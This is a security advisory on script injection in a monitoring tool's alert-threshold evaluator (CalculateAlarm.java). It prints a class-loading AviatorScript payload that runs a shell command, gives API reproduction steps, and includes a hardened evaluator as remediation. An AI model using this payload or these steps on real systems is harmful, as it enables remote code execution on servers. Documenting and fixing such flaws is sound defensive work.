Vulnerability cause
In CalculateAlarm.java, AviatorEvaluator is used to execute threshold expressions directly, with no security policy configured. Because AviatorScript can call arbitrary Java static methods by default, this allows AviatorScript script injection.
For example, running the following AviatorScript script causes the command touch /tmp/pwned to be executed:
use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('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');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('Evil',str,loader);
Reproduction
Call /api/alert/define to define a threshold-trigger expression.
Call /api/monitor to add a website monitor, which causes the expression to be evaluated.
The command is executed successfully inside the Docker container.
Remediation
Configure the security policy described in the AviatorScript documentation, for example disabling the unrestricted invocation of Java static methods, before evaluating any user-supplied expression.
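A locked-down evaluator of the kind this remediation calls for, as an added example that is not HertzBeat's own code. Class and method names of the wrapper are hypothetical; the AviatorScript option and feature names follow the 5.x documentation and should be checked against the version actually in use.

```java
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

import com.googlecode.aviator.AviatorEvaluator;
import com.googlecode.aviator.AviatorEvaluatorInstance;
import com.googlecode.aviator.Feature;
import com.googlecode.aviator.Options;

// Evaluates alert-threshold rules with a dedicated, restricted AviatorScript instance.
// Wrapper names are assumed for illustration; they are not HertzBeat's.
public final class SafeThresholdEvaluator {

    private static final AviatorEvaluatorInstance SAFE = buildSafeInstance();

    private static AviatorEvaluatorInstance buildSafeInstance() {
        // A private instance, not the shared AviatorEvaluator.getInstance(), so the
        // restrictions cannot be loosened by other code that uses the global one.
        AviatorEvaluatorInstance inst = AviatorEvaluator.newInstance();
        // Layer 1: shrink the language. Threshold rules only need operators and the
        // ternary form, so `use`, `new`, `let`, `fn`, `lambda`, loops and assignment
        // are all disabled by passing an empty feature set.
        inst.setOption(Options.FEATURE_SET, Feature.asSet());
        // Layer 2: class allow-lists for static calls and instantiation. An empty set
        // is assumed (per the docs) to permit no class at all, unlike the null default.
        inst.setOption(Options.ALLOWED_CLASS_SET, Collections.<Class<?>>emptySet());
        inst.setOption(Options.ASSIGNABLE_ALLOWED_CLASS_SET, Collections.<Class<?>>emptySet());
        return inst;
    }

    /** Run when a rule is saved (the /api/alert/define path): reject it before it is ever executed. */
    public static boolean isAcceptableRule(String expr) {
        try {
            SAFE.compile(expr, false);   // do not cache untrusted text
            return true;
        } catch (Exception e) {          // syntax error or disabled feature: fail closed
            return false;
        }
    }

    /** Run when a metric sample arrives (the /api/monitor path). */
    public static boolean fires(String expr, Map<String, Object> metrics) {
        return Boolean.TRUE.equals(SAFE.execute(expr, metrics, false));
    }

    public static void main(String[] args) {
        Map<String, Object> metrics = new HashMap<>();
        metrics.put("responseTime", 2500);   // constructed sample value
        System.out.println("plain rule accepted: " + isAcceptableRule("responseTime > 1000"));
        System.out.println("plain rule fires: " + fires("responseTime > 1000", metrics));
        // The report's payload begins with `use ...; let ...`; both statements need disabled features.
        System.out.println("use/let rule accepted: " + isAcceptableRule("use java.lang.Math; let x = 1;"));
    }
}
```

Validating at define time with the same instance used at evaluation time is what makes the gate meaningful: a rule that compiles under the restricted feature set cannot later reach features the evaluator does not have.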